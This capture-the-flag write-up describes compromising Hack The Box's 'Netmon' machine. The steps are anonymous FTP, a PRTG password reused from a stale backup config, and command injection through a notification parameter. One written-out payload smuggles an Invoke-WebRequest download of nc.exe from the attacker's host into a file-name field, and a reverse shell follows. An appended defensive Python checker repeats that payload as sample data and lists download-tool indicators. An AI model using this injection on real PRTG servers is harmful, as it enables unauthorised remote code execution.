Hello again. Netmon is a Windows machine from Hack The Box. I enjoyed getting root on this machine, as it required a little extra out-of-the-box thinking. Let's start the dirty work; the IP of the machine is 10.10.10.152.
Scanning with Nmap: nmap -sV 10.10.10.152
As we can see on port 21, anonymous login is allowed. So let's play with FTP.
After googling about the PRTG configuration file, I found the location as
%programdata%\Paessler\PRTG Network Monitor
After looking through the files, I found a password in PRTG Configuration.old.bak, and as you can see, the database hasn't been updated for a long time, i.e. since 2018. So the password in 2018 was with the same year number; it's 2019, so I changed the password to the same year.
Tadda!! I logged in.
After visiting the profile section, I tried to add a new notification.
Let me create a new notification with the name testMB
I gave a random file name and tried to copy the root.txt file to a new file, minions.txt, and as the curse of pentest follows, I was unable to copy the root flag (it took 20-30 attempts).
I returned to the Swiss Army knife and tried this time with nc.exe.
Again I edited the Execute Program setting and tried to transfer nc.exe from my Kali to the target.
test.txt; Invoke-WebRequest http://10.10.14.9:8000/nc.exe -OutFile c:\Users\Public\Downloads\nc.exe
Let’s check whether nc is transferred or not.
Woooshh!! Finally, something good happened. Let’s try to execute nc and start nc listener on kali.
Well, this worked, and finally, after a plethora of trials, I got a shell with root.txt.
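
From the defender's side, the notification parameter used above can be audited. The following Python check is an added example, not part of the original write-up: it flags any notification parameter that is not a plain file name. The allowlist rule, the indicator list, and the sample notifications other than testMB are assumptions.

```python
import re

# Assumption: a parameter for a file-writing notification script should be
# a single plain file name. Anything else gets reported.
SAFE_PARAM = re.compile(r"^[A-Za-z0-9_.\-]{1,64}$")

# Patterns worth naming in an alert. Illustrative, not exhaustive.
INDICATORS = {
    "command separator": re.compile(r"[;&|`\n]|\$\("),
    "network download": re.compile(
        r"\b(Invoke-WebRequest|iwr|wget|curl|Net\.WebClient|"
        r"Start-BitsTransfer|certutil)\b", re.I),
    "remote URL": re.compile(r"\bhttps?://[^\s'\"]+", re.I),
    "executable written to disk": re.compile(
        r"-OutFile\s+\S+\.(exe|dll|ps1|bat)\b", re.I),
}


def review_parameter(param):
    """Return the reasons a parameter is suspicious (empty list = fine)."""
    if SAFE_PARAM.fullmatch(param.strip()):
        return []
    reasons = [name for name, rx in INDICATORS.items() if rx.search(param)]
    return reasons or ["not a plain file name"]


def review_notifications(notifications):
    """notifications: iterable of (name, parameter). Returns {name: reasons}."""
    report = {}
    for name, param in notifications:
        reasons = review_parameter(param)
        if reasons:
            report[name] = reasons
    return report


# Constructed sample data. Only the testMB parameter comes from the post.
SAMPLE = [
    ("ticket-log", "outage.txt"),
    ("testMB", r"test.txt; Invoke-WebRequest http://10.10.14.9:8000/nc.exe "
               r"-OutFile c:\Users\Public\Downloads\nc.exe"),
    ("spaced", "my report.txt"),
]

if __name__ == "__main__":
    for name, reasons in review_notifications(SAMPLE).items():
        print(f"{name}: {', '.join(reasons)}")
```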